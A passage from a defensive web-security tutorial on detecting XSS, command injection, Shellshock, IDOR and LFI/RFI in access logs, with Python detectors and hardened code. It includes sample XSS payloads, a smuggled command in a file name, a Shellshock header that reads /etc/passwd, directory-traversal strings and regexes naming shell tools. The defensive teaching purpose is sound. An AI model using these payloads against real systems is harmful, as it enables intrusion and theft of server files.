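
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "js_call": re.compile(r"\b(alert|prompt|confirm|eval|console\.log|document\.write|String\.fromCharCode)\s*\(", re.I),
    "event_handler": re.compile(r"\bon(error|load|mouseover|focus|click)\s*=", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "html_injection": re.compile(r"<\s*(img|svg|iframe|body|input|a)\b", re.I),
}
TOOL_UA = re.compile(r"(python-urllib|python-requests|curl|wget|go-http-client|wfuzz|sqlmap|nikto)", re.I)


def decode_param(value):
    """Undo the encodings attackers stack to get past naive filters."""
    decoded = unquote_plus(value)
    if re.search(r"%[0-9A-Fa-f]{2}", decoded):   # still percent-encoded: double encoding
        decoded = unquote_plus(decoded)
    return html.unescape(decoded)                 # entity-encoded tags


def classify(decoded):
    """Names of the XSS techniques present in an already-decoded value."""
    return [name for name, pattern in XSS_PATTERNS.items() if pattern.search(decoded)]


def analyze(events):
    """Per User-Agent: requests carrying XSS, cadence regularity, and whether it looks like a tool."""
    by_ua = defaultdict(list)
    for ts, s_value, ua in events:
        by_ua[ua].append((datetime.fromisoformat(ts), s_value))
    report = {}
    for ua, items in by_ua.items():
        items.sort()
        hits = [classify(decode_param(s_value)) for _, s_value in items]
        times = [t for t, _ in items]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_gap, regular = None, False
        if len(gaps) >= 4:                        # need a few intervals before judging regularity
            mean_gap = statistics.mean(gaps)
            cv = statistics.pstdev(gaps) / mean_gap if mean_gap else 0.0
            regular = cv < 0.25                   # assumed threshold: a person's gaps vary far more
        tool = bool(TOOL_UA.search(ua))
        report[ua] = {
            "requests": len(items),
            "xss_requests": sum(1 for h in hits if h),
            "techniques": sorted({name for h in hits for name in h}),
            "mean_gap_s": mean_gap,
            "regular_cadence": regular,
            "tool_ua": tool,
            "automated": regular or tool,
        }
    return report


SCANNER_UA = "Python-urllib/3.8"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
# Constructed events: seven probes 3-4 s apart from urllib, two ordinary searches from a browser.
EVENTS = [
    ("2022-02-19T11:09:24", "%3Cscript%3Eprompt(1)%3C%2Fscript%3E", SCANNER_UA),
    ("2022-02-19T11:09:27", "%3Cscript%3Econsole.log(1)%3C%2Fscript%3E", SCANNER_UA),
    ("2022-02-19T11:09:31", "%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E", SCANNER_UA),
    ("2022-02-19T11:09:34", "%3Csvg%2Fonload%3Dalert(1)%3E", SCANNER_UA),
    ("2022-02-19T11:09:38", "javascript%3Aalert(1)", SCANNER_UA),
    ("2022-02-19T11:09:41", "%253Cscript%253Ealert(1)%253C%252Fscript%253E", SCANNER_UA),
    ("2022-02-19T11:09:45", "%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B", SCANNER_UA),
    ("2022-02-19T11:02:10", "wordpress+security", BROWSER_UA),
    ("2022-02-19T11:15:52", "how+to+select+a+theme", BROWSER_UA),
]

if __name__ == "__main__":
    for ua, summary in analyze(EVENTS).items():
        print(ua, summary)
```

<p>The cadence check is what lets you call a low request rate automated: a tool spacing its requests 3 to 4 seconds apart has a coefficient of variation far below the 0.25 threshold assumed here, while a person searching a blog does not produce evenly spaced requests. The User-Agent is attacker-controlled, so treat the regular cadence as the stronger of the two signals when they disagree.</p><p>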
This tells us that the requests were made by a script or automated vulnerability scanner, not by a person in a browser.</p><p>So was the attack successful?</p><p>We cannot say anything definite, because we do not have access to the responses and, unlike the SQL Injection example, the response size tells us little: a reflected search term changes the page size by roughly the length of the payload whether or not the browser would execute it.</p><p>As a result of our examination:</p><ol><li>The attack targeted the Wordpress search function (the “s” parameter of “/blog/”) of the web application the access logs came from.</li><li>From the steady request cadence and the User-Agent, the attack was performed with an automated vulnerability scanner.</li><li>Because the application is behind Cloudflare, the logged source IP addresses belong to Cloudflare and the attacker’s real address could not be determined from these logs.</li><li>We do not know whether the attack was successful.</li></ol><h3>Detecting Command Injection Attacks</h3><h3>What are Command Injection Attacks?</h3><p>Command Injection attacks happen when data received from a user is not sanitized and is passed directly to the operating system shell as part of a command.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/479/0*ASGAAHPybhR2I_Ss.png" /></figure><p>Attackers exploit command injection vulnerabilities to execute arbitrary commands on the operating system. Because the attacker’s goal is to take control of the server itself, these vulnerabilities are more critical than most other web vulnerabilities.</p><p>The injected command runs with the privileges of the account the web application runs as. On a correctly configured server that is an unprivileged service account; on a misconfigured one, where the web server runs as root or Administrator, the attacker gets administrative access immediately.</p><h3>How Command Injection Works?</h3><p>Command injection vulnerabilities arise when data received from the user is placed into a shell command without sanitization. Let’s examine this with an example.</p><p>Let’s say we have a basic web application that copies a file uploaded by the user into the “/tmp” folder. 
The web application’s code is below.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/457/0*ANFFkp512eaKUuId.png" /></figure><p>Under normal conditions the application works as intended. For example, if we upload a file named “letsdefend.txt” it is copied to the “/tmp” folder.</p><p>So, what happens if we upload a file named “letsdefend;ls;.txt”? The file name is concatenated into the command, which becomes:</p><p>Command: <strong>cp letsdefend;ls;.txt</strong></p><p>In the shell, “;” ends one command and starts the next. So the shell sees the line above as three separate commands and executes them in turn:</p><ol><li>cp letsdefend</li><li>ls</li><li>.txt</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/557/0*tKjm-uMq7n-a7WTa.png" /></figure><p>The first command is the intended copy, but because its arguments have been cut short it fails with an error.</p><p>Command #2 is the directory listing the attacker wanted to run. The application does not return the command output to the user, so the attacker cannot see the listing directly, but the operating system executes it successfully. (In a real attack the attacker would add output redirection, a DNS or HTTP callback, or a time delay such as sleep to confirm execution without seeing the output.)</p><p>Command #3 produces an error, because there is no command named “.txt”.</p><p>As you see, attacker-supplied text was executed as a command on the web server’s operating system. What if the attacker uploads a file named “letsdefend;shutdown;.txt”? The operating system would shut down and the web application would stop functioning.</p><p>With the right payload, the attacker can spawn a reverse shell and obtain interactive access to the server.</p><h3>How Attackers Leverage with Command Injection Attacks</h3><p>Attackers can execute commands on the operating system by exploiting command injection vulnerabilities. 
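</p><p>The flaw is easiest to see next to its fix. The following Python is an added example, not the article’s code (which is shown only as an image): build_shell_command() repeats the mistake of pasting the file name into a command string, shell_commands() shows how the shell splits that string on “;” into the three commands listed above, and validate_name(), safe_copy_argv() and copy_upload() show the hardened approaches: reject anything but a plain file name, pass arguments as a list so no shell interprets them, or drop the external command altogether. The upload directory is hypothetical and demo_copy() uses temporary directories so the example runs anywhere.</p>

```python
"""Command injection: the vulnerable copy from the article beside a hardened version.

Added example.  The article's code is shown only as an image; this Python
re-creation illustrates the same flaw and is not that code.  The upload and
target directories are hypothetical, and demo_copy() builds a throw-away
upload in a temporary directory so the example runs anywhere.
"""
import os
import re
import shlex
import shutil
import tempfile

UPLOAD_DIR = "/var/www/uploads"   # hypothetical location of uploaded files
TARGET_DIR = "/tmp"


def build_shell_command(filename):
    """VULNERABLE: the file name is concatenated into a string that a shell will interpret."""
    return f"cp {UPLOAD_DIR}/{filename} {TARGET_DIR}/"


def shell_commands(command_line):
    """Split a command line the way sh does on ';' and '|' (quotes honoured via shlex)."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=";|")
    commands, current = [], []
    for token in lexer:
        if token in (";", "|"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def validate_name(filename):
    """Allowlist: a bare file name of safe characters; anything else is rejected, not cleaned."""
    if os.path.basename(filename) != filename or not SAFE_NAME.match(filename):
        raise ValueError(f"rejected file name {filename!r}")
    return filename


def safe_copy_argv(filename):
    """HARDENED (if an external command is unavoidable): an argv list, never a shell string."""
    name = validate_name(filename)
    # "--" stops cp from treating a name that starts with "-" as an option
    return ["cp", "--", os.path.join(UPLOAD_DIR, name), TARGET_DIR + "/"]


def copy_upload(filename, upload_dir, target_dir):
    """PREFERRED: no command at all; validate, then use the library call."""
    name = validate_name(filename)
    return shutil.copy2(os.path.join(upload_dir, name), os.path.join(target_dir, name))


def demo_copy():
    """End-to-end run in temporary directories; returns the copied file's content."""
    with tempfile.TemporaryDirectory() as upload_dir, tempfile.TemporaryDirectory() as target_dir:
        with open(os.path.join(upload_dir, "letsdefend.txt"), "w") as fh:
            fh.write("hello from letsdefend")
        dest = copy_upload("letsdefend.txt", upload_dir, target_dir)
        with open(dest) as fh:
            return fh.read()


if __name__ == "__main__":
    print(shell_commands(build_shell_command("letsdefend;ls;.txt")))
    print(safe_copy_argv("letsdefend.txt"))
    print(demo_copy())
```

<p>Note the order of defences: the allowlist rejects the name rather than trying to strip dangerous characters from it, because a blocklist of “;” and “|” misses backticks, $( ), newlines and whatever the next shell feature is; and even a validated name is passed as an argv element, so that the shell never sees user input at all. shutil.copy2 is the version to prefer, since it involves no command to inject into.</p><p>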
This means that the web application, its data, and every other component on the server are at risk, and the server can become a foothold for attacking the rest of the network.</p><h3>How to Prevent Command Injection</h3><ul><li><strong>Always sanitize data received from a user:</strong> Never trust data received from a user. Not even a file name! Validate it against a strict allowlist (for example, only letters, digits, dots, dashes and underscores) and reject anything else.</li><li><strong>Avoid the shell altogether: </strong>Wherever possible, do not build command strings. Use the language’s own API (a file copy function instead of cp) or pass the program and its arguments as a list to an exec-style call, so that shell metacharacters such as ; | &amp; $ and backticks are never interpreted.</li><li><strong>Limit user rights: </strong>Run the web application as a dedicated low-privilege account whenever possible. Hardly any web application needs administrative rights.</li><li><strong>Make use of isolation technologies such as containers (for example Docker)</strong>, so that a compromised application has limited reach into the host.</li></ul><h3>Detecting Command Injection Attacks</h3><p>I think we all understand how critical command injection vulnerabilities are. If such a vulnerability is exploited and goes undetected, the company involved may lose a great amount of money and reputation.</p><p>So, how can we detect Command Injection attacks?</p><p>There is more than one way. These are:</p><ul><li><strong>When examining a web request, look at all of its fields: </strong>Depending on how the web application works, the vulnerable input may be a URL parameter, a form field, a file name, a cookie or a request header. This is why you should check every part of the request.</li><li><strong>Look for shell syntax and command names: </strong>Check the data received from the user for command separators and substitution syntax such as ; | &amp;&amp; ` $( ) and for command names such as dir, ls, cp, cat, type, whoami, id, ping, wget and curl.</li><li><strong>Familiarize yourself with frequently used Command Injection payloads: </strong>When attackers find a command injection vulnerability, they usually establish a reverse shell to work more comfortably. 
Knowing the frequently used Command Injection payloads, and the reverse shell one-liners in particular, makes it much easier to detect a command injection attack.</li></ul><h3>Detection Example</h3><p>In this example we will not be looking at access logs; instead we will examine a single HTTP request.</p><blockquote><em>GET / HTTP/1.1</em></blockquote><blockquote><em>Host: yourcompany.com</em></blockquote><blockquote><em>User-Agent: () { :;}; echo "NS:" $(&lt;/etc/passwd)</em></blockquote><blockquote><em>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</em></blockquote><blockquote><em>Accept-Encoding: gzip, deflate</em></blockquote><blockquote><em>Accept-Language: en-US,en;q=0.9</em></blockquote><blockquote><em>Connection: close</em></blockquote><p>Looking at the request line, we see that the main page of the web application yourcompany[.]com has been requested. Nothing unusual so far.</p><p>But when we look at the request headers, the User-Agent header stands out. Where we would expect browser and operating system information, there is a bash function definition followed by a shell command.</p><p>This request was captured during the exploitation of a vulnerability named Shellshock (CVE-2014-6271). Shellshock was published in September 2014 and had a massive impact, because bash is present on almost every Linux and Unix system.</p><p>Shellshock is a vulnerability in the way bash imported function definitions from environment variables: a variable whose value began with “() {” was treated as a function, and bash also executed any commands that followed the closing brace. Web servers that run CGI scripts export request headers as environment variables (User-Agent becomes HTTP_USER_AGENT), so an attacker could put the payload in a header and have bash execute it as soon as a CGI script invoked a shell. 
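</p><p>The lesson of this request is that the payload is not in the URL but in a header, so a detector has to look at every field. The following Python is an added example, not code from the original article or from any product: parse_request() splits a raw HTTP request into its request line and headers, and scan_request() applies two checks to each field, the Shellshock marker “() {” and generic shell syntax combined with a command name. The request is constructed after the one above; it uses cat instead of bash’s own $(&lt;file) redirection so that it reads the same in any log viewer, and a benign browser request is included for comparison.</p>

```python
"""Scan every field of a raw HTTP request for shell code.

Added example, not from the original article.  The request below is
constructed after the article's Shellshock capture, with "cat /etc/passwd" in
place of bash's own file redirection; the benign request is a normal browser
request for comparison.
"""
import re

# Shellshock (CVE-2014-6271): an environment variable whose value starts with "() {"
# is parsed by vulnerable bash as a function definition, and the commands after it run.
SHELLSHOCK = re.compile(r"\(\)\s*\{")
# Generic command-injection syntax: separators, pipes, substitution.
SHELL_SYNTAX = re.compile(r"(;|\|\||\|\s*\w|`|\$\(|\$\{)")
# Command names attackers reach for first.
SHELL_COMMANDS = re.compile(r"\b(cat|ls|id|whoami|uname|wget|curl|nc|bash|sh|ping|echo|dir|type)\b")


def parse_request(raw):
    """Split a raw request into method, target, version, headers and body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.strip().splitlines()
    method, target, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def scan_request(raw):
    """Return (field, finding) pairs; every header is checked, not only the URL."""
    req = parse_request(raw)
    fields = {"target": req["target"], "body": req["body"]}
    fields.update({f"header:{name}": value for name, value in req["headers"].items()})
    findings = []
    for name, value in fields.items():
        if SHELLSHOCK.search(value):
            findings.append((name, "shellshock-function-definition"))
        # ';' alone is normal in Accept/Accept-Language, so require a command name as well
        if SHELL_SYNTAX.search(value) and SHELL_COMMANDS.search(value):
            findings.append((name, "shell-syntax-with-command"))
    return findings


REQUEST = (
    "GET / HTTP/1.1\n"
    "Host: yourcompany.com\n"
    'User-Agent: () { :;}; echo "NS:" $(cat /etc/passwd)\n'
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\n"
    "Accept-Encoding: gzip, deflate\n"
    "Accept-Language: en-US,en;q=0.9\n"
    "Connection: close\n"
    "\n"
)
BENIGN = (
    "GET / HTTP/1.1\n"
    "Host: yourcompany.com\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/98.0 Safari/537.36\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
    "Connection: close\n"
    "\n"
)

if __name__ == "__main__":
    print(scan_request(REQUEST))
    print(scan_request(BENIGN))
```

<p>Applied to the constructed request, both checks fire on the User-Agent header and on nothing else: the “;” in the Accept and Accept-Language headers is ordinary HTTP syntax and carries no command name, which is why the generic check requires both. Network and web application firewall signatures for Shellshock key on the same “() {” prefix.</p><p>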
Shellshock is a great example of a command injection attack: attacker-controlled input (a request header) ends up being executed by a shell.</p><p>When the command in the User-Agent header is executed, the contents of “/etc/passwd” are printed by the CGI script before its normal output, so they are returned to the attacker in the HTTP response as a header named “NS”. The “NS:” prefix is there precisely so that the CGI interface treats the echoed line as a header.</p><h3>Detecting Insecure Direct Object Reference (IDOR) Attacks</h3><h3>What is IDOR?</h3><p><strong>I</strong>nsecure <strong>D</strong>irect <strong>O</strong>bject<strong> R</strong>eference (IDOR) is a vulnerability caused by a missing or incorrectly implemented authorization check. It enables a user to access an object that belongs to someone else simply by referring to it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/600/0*s1z_38dcwunEUE4T.png" /></figure><p>In the OWASP Top 10 of 2021, the category that covers IDOR, “Broken Access Control”, takes first place.</p><h3>How IDOR Works</h3><p>Unlike the other web vulnerabilities in this series, IDOR is not caused by missing sanitization; the input may be perfectly well formed. The problem is missing authorization: the attacker manipulates the parameters sent to the web application, gains access to an object that does not belong to him, and is able to read, change or delete its contents.</p><p>Here is an example to better understand how an IDOR vulnerability is exploited.</p><p>Let’s imagine a basic web application. It reads the “<strong>id”</strong> parameter from the request and displays the data of the user with that id.</p><p>URL: <a href="https://letsdefend.io/get_user_information?id=1"><strong>https://letsdefend.io/get_user_information?id=1</strong></a></p><p>When a request like the one above is made, the application displays the information of the user whose id is 1.</p><p>If I am the user making the request and my id is 1, everything works normally: I see my own personal information.</p><p>But what happens if we make a request with 2 as the “id” parameter? 
Or 3?</p><p>If the web application does not check “does the id in this request belong to the person making it?”, then anyone can send the request with my id and see my personal information. This vulnerability is called IDOR.</p><p>Attackers reach objects that do not belong to them by changing parameters such as “id”. What they can obtain depends on the web application, but either way you would not want anyone else to access your personal information, right?</p><h3>How Attackers Leverage with IDOR Attacks</h3><p>What an attacker can do is limited by the function in which the IDOR vulnerability occurs, but the most common place to find one is a page that returns a user’s information. By exploiting an IDOR vulnerability an attacker could:</p><ul><li>Steal personal information</li><li>Access documents he is not authorized to see</li><li>Perform unauthorized operations (for example deleting or altering another user’s data)</li></ul><h3>How to Prevent IDOR</h3><p>To build an application without IDOR vulnerabilities, always check on the server, on every request, that the person making the request is authorized to access the specific object being requested.</p><p>On top of this, remove unnecessary parameters and take as few values as possible from the user. In the previous example we do not need the “id” parameter at all: instead of reading it from the request, we can identify the person making the request from the server-side session. Where an object identifier must be exposed, prefer unguessable values (random UUIDs) over sequential integers; this makes enumeration impractical, although it does not replace the authorization check.</p><h3>Detecting IDOR Attacks</h3><p>IDOR attacks are harder to detect than the other attacks in this series, because they do not have characteristic payloads the way SQL Injection and XSS do: an IDOR request looks exactly like a legitimate one, apart from the value of the identifier.</p><p>Having the HTTP responses at hand would help, but responses are rarely logged, which makes IDOR attacks harder to identify.</p><p>There are a couple of methods used in identifying IDOR attacks. 
These are:</p><ul><li><strong>Check all parameters: </strong>An IDOR vulnerability may occur in any parameter that identifies an object, not only one named “id”. Do not forget to check all of them.</li><li><strong>Look at the number of requests made for the same page: </strong>Once attackers find an IDOR vulnerability they want the information of every other user as well, so they usually enumerate identifiers with a brute force attack. This shows up as many requests for the same page from one source, differing only in the identifier.</li><li><strong>Try to find a pattern: </strong>Because attackers enumerate predictable values, such as sequential integers, you can look for a pattern in the requests. For example, if you see id=1, id=2, id=3 and so on from the same source within a short time, you should suspect an IDOR attack.</li></ul><h3>Detection Example</h3><p>Below you can see a screenshot of the access logs of a web server running Wordpress.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*wdOiMta3EBqD2Y9E.png" /></figure><p>As in our other examples, let’s start with a general overview. There are no special characters in these requests, so the logs are easy to read.</p><p>If you have used Wordpress before, you may know that the “wp-admin/user-edit.php?user_id=” page shows the profile of a registered Wordpress user. Accessing this page can be perfectly normal, and an administrator with several users would access it with more than one “user_id” value. But it is not normal to see this many different “user_id” values requested one after another.</p><p>It looks like we have an IDOR attack on our hands.</p><p>When we look at the source IP address, we see that it belongs to Cloudflare. This means that the web application whose access logs we received is behind a Cloudflare service. 
The requests therefore reached the web application through Cloudflare, and the address in the log is Cloudflare’s, not the attacker’s.</p><p>We see 15–16 requests within the short time window covered by these logs, which indicates an automated tool. Looking at the User-Agent header, it reads “wfuzz/3.1.0”. Wfuzz is a web fuzzer frequently used by attackers to enumerate parameters. So we have not only determined that this attack was performed with an automated tool, we have also identified the tool: Wfuzz.</p><p>But we still have not answered the most important question. Was the attack successful?</p><p>Was the attacker able to obtain the users’ information?</p><p>Our job would be easier if we had the HTTP responses. Since we do not, let’s look at the response sizes in the access logs and make an inference.</p><p>As we mentioned before, the requested page displays user information. Different users have different names, surnames and usernames, so successful responses for different user_id values should differ in size. This is why we can set aside the requests with a response size of 479 bytes.</p><p>Looking at the requests with response sizes of 5691 and 5692, we see that their response code is 302 (redirect). A request that successfully returns a page is generally answered with code 200, whereas a 302 here most likely sends the unauthenticated client to the Wordpress login page. So the attack appears to have been unsuccessful, although this alone is not sufficient to be certain.</p><p>There are 10 requests with a response size of 5692 and 4 with a response size of 5691.</p><p>As we stated before, it is very unlikely that the combined size of different users’ names, surnames and usernames would be identical. 
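</p><p>The reasoning above (many requests for the same page that walk through consecutive identifiers, a tool User-Agent, redirects and near-identical response sizes) can be turned into a scoring function. The following Python is an added example, not code from the original article: the records are constructed (timestamp, source IP, URL, status, size, User-Agent) tuples modelled on the screenshot, with a wfuzz run over user_id 1 to 14 answered by 302 responses of 5692 and 5691 bytes, plus two ordinary administrator requests. The source address is a documentation IP standing in for the Cloudflare edge address the real log shows, which is why the function groups requests by page, parameter and User-Agent rather than by IP.</p>

```python
"""Spot identifier enumeration (IDOR brute force) in parsed access-log records.

Added example, not from the original article.  Records are constructed
(timestamp, source IP, URL, status, response size, User-Agent) tuples modelled
on the article's screenshot.  The source IP is a documentation address standing
in for the CDN edge address the real log shows, so grouping is done by
User-Agent rather than by IP.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

TOOL_UA = re.compile(r"(wfuzz|ffuf|burp|sqlmap|python-requests|python-urllib|curl|go-http-client)", re.I)


def object_refs(url):
    """Yield (path, parameter, value) for every integer-valued query parameter."""
    parts = urlsplit(url)
    for name, values in parse_qs(parts.query).items():
        for value in values:
            if value.isdigit():
                yield parts.path, name, int(value)


def find_enumeration(records, min_requests=5):
    """Group requests by (page, parameter, User-Agent) and score each group for enumeration."""
    groups = defaultdict(list)
    for ts, ip, url, status, size, ua in records:
        for path, param, value in object_refs(url):
            groups[(path, param, ua)].append((datetime.fromisoformat(ts), value, status, size))
    findings = []
    for (path, param, ua), items in groups.items():
        if len(items) < min_requests:
            continue
        items.sort()
        values = sorted({item[1] for item in items})
        diffs = [b - a for a, b in zip(values, values[1:])]
        sequential_ratio = sum(1 for d in diffs if d == 1) / len(diffs) if diffs else 0.0
        span = (items[-1][0] - items[0][0]).total_seconds()
        statuses = Counter(item[2] for item in items)
        sizes = [item[3] for item in items]
        # without response bodies, status codes and size spread are the best success signal:
        # redirects/denials with near-identical sizes mean the attacker kept getting the same page
        denied = sum(statuses[c] for c in (301, 302, 401, 403)) / len(items)
        size_spread = len(set(sizes)) / len(sizes)
        if denied >= 0.8 and size_spread <= 0.25:
            verdict = "likely unsuccessful"
        elif statuses[200] / len(items) >= 0.8 and size_spread >= 0.75:
            verdict = "likely successful"
        else:
            verdict = "undetermined"
        rate = len(items) / max(span, 1.0)
        tool = bool(TOOL_UA.search(ua))
        findings.append({
            "path": path, "param": param, "ua": ua,
            "requests": len(items), "distinct_values": len(values),
            "sequential_ratio": round(sequential_ratio, 2),
            "requests_per_second": round(rate, 2),
            "statuses": dict(statuses), "distinct_sizes": sorted(set(sizes)),
            "tool_ua": tool,
            "automated": sequential_ratio >= 0.8 and (rate >= 0.5 or tool),
            "verdict": verdict,
        })
    return findings


CDN_IP = "192.0.2.10"       # constructed: stands in for the Cloudflare edge address in the log
WFUZZ_UA = "wfuzz/3.1.0"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
# Constructed: 14 wfuzz requests one second apart over user_id=1..14, then two normal admin requests.
RECORDS = [
    (f"2022-02-19T11:20:{1 + i:02d}", CDN_IP, f"/wp-admin/user-edit.php?user_id={i + 1}",
     302, 5692 if i < 10 else 5691, WFUZZ_UA)
    for i in range(14)
] + [
    ("2022-02-19T09:05:12", CDN_IP, "/wp-admin/user-edit.php?user_id=1", 200, 71234, BROWSER_UA),
    ("2022-02-19T09:07:40", CDN_IP, "/wp-admin/user-edit.php?user_id=2", 200, 71302, BROWSER_UA),
]

if __name__ == "__main__":
    for finding in find_enumeration(RECORDS):
        print(finding)
```

<p>The verdict rule is deliberately conservative: it reports “likely unsuccessful” only when nearly every response was a redirect or denial and the sizes barely vary, and “likely successful” only when nearly every response was a 200 with sizes that differ per identifier; anything in between is left “undetermined” for a human, which is where this case would land without the status codes. Lower min_requests to see the administrator’s two legitimate requests appear as a separate, non-automated group.</p><p>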
Identical sizes across the enumerated user_id values therefore strengthen the conclusion that the attack was not successful: the attacker was most likely redirected every time instead of receiving user profiles.</p><h3>Detecting RFI &amp; LFI Attacks</h3><h3>What is Local File Inclusion (LFI)?</h3><p>Local File Inclusion (LFI) is the vulnerability that occurs when a file is included using unsanitized data obtained from a user. It differs from RFI in that the file being included is on the same web server that hosts the web application.</p><p>Attackers can read sensitive files on the web server, such as configuration files containing database credentials or SSH keys, which can give them remote access to the server. If they can also write content to a file on the server (a log, an uploaded image, or the session store) they can include that file and achieve code execution.</p><h3>What is Remote File Inclusion (RFI)?</h3><p>Remote File Inclusion (RFI) is the vulnerability that occurs when a file is included using unsanitized data obtained from a user. It differs from LFI in that the file being included is hosted on a different server, one the attacker controls.</p><p>The attacker hosts malicious code on his own server, points the vulnerable application at it, and the application fetches and executes that code.</p><h3>How LFI &amp; RFI Works?</h3><p>Like most web application vulnerabilities, LFI and RFI are caused by not sanitizing data received from a user.</p><p>SQL Injection vulnerabilities occur when data received from a user is placed into SQL queries; Command Injection vulnerabilities occur when data received from a user is executed directly in the system shell; IDOR vulnerabilities occur when data received from a user is used to access objects without an authorization check. LFI and RFI vulnerabilities occur when data received from a user is used directly to choose which file, on the local system or on a remote server, the application includes.</p><p>Why would data received from a user be used to choose a file to include? Web applications have become highly complex, and unfortunately every feature that is developed can also be abused. 
A common example is the language option: many web applications include a language-specific file based on a parameter received from the user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/519/0*vn9SX5DuxfrxwjkB.png" /></figure><p>If we examine the piece of code in the image above, we see that the website language is selected using the “language” parameter received from the user, and that parameter is placed directly into the path of the file to include.</p><p>Under normal use the web application works as planned. For example, if “en” is entered as the “language” parameter, the file below is included:</p><p>“website/<strong>en</strong>/home.php”</p><p>But if an attacker enters the payload below into the “language” parameter, the web application instead displays the “/etc/passwd” file to the user.</p><p>Payload:<strong> /../../../../../../../../../etc/passwd%00</strong></p><p>“website/<strong>/../../../../../../../../../etc/passwd%00</strong>/home.php”</p><p>“../” moves to the parent directory. Because the attacker does not know which directory the web application lives in, he repeats “../” enough times to be sure of reaching the root of the file system (extra “../” at the root are harmless). He then names the “/etc/passwd” file, and the application includes it. The “%00” at the end is a URL encoded null byte, which terminates the string in the C functions underneath older PHP versions, so the trailing “/home.php” is never seen. This null byte trick was fixed in PHP 5.3.4, but the directory traversal itself still works wherever the parameter is not validated, and attackers will try variants such as “..%2f”, “%2e%2e/” and double encoding (“%252e%252e%252f”) to get past naive filters.</p><h3>How Attackers Leverage with RFI &amp; LFI</h3><ul><li>Code execution</li><li>Sensitive information disclosure</li><li>Denial of service</li></ul><h3>How to Prevent LFI &amp; RFI</h3><p>The most effective way to prevent RFI and LFI attacks is to sanitize any data received from a user before using it and, better still, never to use user input as a path at all: map the parameter to a fixed allowlist of file names (“en”, “fr”, “de”) and reject anything else. Do not forget that client-side controls are easily bypassed, so the checks must be enforced on the server; client-side checks are only a convenience for the user.</p><h3>Detecting LFI &amp; RFI Attacks</h3><p>We previously mentioned what attackers can accomplish with RFI and LFI attacks. 
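</p><p>Here is the language include above re-created in Python together with its fix and a detector for the payloads this section describes. It is an added example, not the article’s PHP code: include_path_unsafe() pastes the parameter into the path exactly as the image shows and escapes_base() shows where that resolves to; include_path_safe() maps the parameter to an allowlist and then confirms the canonical path still lies under the web root; and classify_include_param() flags traversal sequences (raw, encoded and double-encoded), the %00 terminator, well-known sensitive file names, and the http://, php:// and data: prefixes that mark RFI and wrapper attempts. The web root, the allowlist and the remote host 203.0.113.5 are constructed for the example.</p>

```python
"""File inclusion: resolving the "language" parameter safely, and spotting LFI/RFI payloads.

Added example.  The article's include is PHP shown only as an image; this
Python version illustrates the same pattern and is not that code.  The web
root, the language allowlist, the payloads and the remote host (203.0.113.5, a
documentation address) are constructed for the demonstration.
"""
import os
import re
from urllib.parse import unquote

ALLOWED_LANGUAGES = {"en", "fr", "de"}


def include_path_unsafe(base, language):
    """VULNERABLE: mirrors website/$lang/home.php with the parameter pasted into the path."""
    return os.path.normpath(f"{base}/{language}/home.php")


def escapes_base(base, language):
    """True when the unsafe construction resolves to a file outside the web root."""
    resolved = include_path_unsafe(base, language)
    return os.path.commonpath([os.path.normpath(base), resolved]) != os.path.normpath(base)


def include_path_safe(base, language):
    """HARDENED: allowlist the value, then canonicalise and confirm it stays under base."""
    if language not in ALLOWED_LANGUAGES:
        raise ValueError(f"unsupported language {language!r}")
    real_base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(real_base, language, "home.php"))
    if os.path.commonpath([real_base, candidate]) != real_base:   # defence in depth
        raise ValueError("resolved path escapes the web root")
    return candidate


TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f|%2e%2e%5c|%252e%252e%252f)", re.I)
SENSITIVE = re.compile(
    r"(/etc/passwd|/etc/shadow|/proc/self/environ|win\.ini|boot\.ini|\.htaccess|wp-config\.php|web\.config|id_rsa)",
    re.I,
)
REMOTE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect|file)://|^\s*data:", re.I)


def classify_include_param(raw):
    """Indicators of LFI/RFI in one parameter value as it appears in the log (URL encoded)."""
    decoded = unquote(raw)
    if re.search(r"%[0-9A-Fa-f]{2}", decoded):
        decoded = unquote(decoded)              # second pass for double-encoded payloads
    reasons = []
    if TRAVERSAL.search(raw) or TRAVERSAL.search(decoded):
        reasons.append("directory-traversal")
    if "\x00" in decoded:
        reasons.append("null-byte-terminator")  # the %00 trick (old PHP only)
    if SENSITIVE.search(decoded):
        reasons.append("sensitive-file-name")
    if REMOTE.search(decoded):
        reasons.append("remote-include-or-wrapper")
    if decoded.startswith("/") or re.match(r"^[A-Za-z]:\\", decoded):
        reasons.append("absolute-path")
    return reasons


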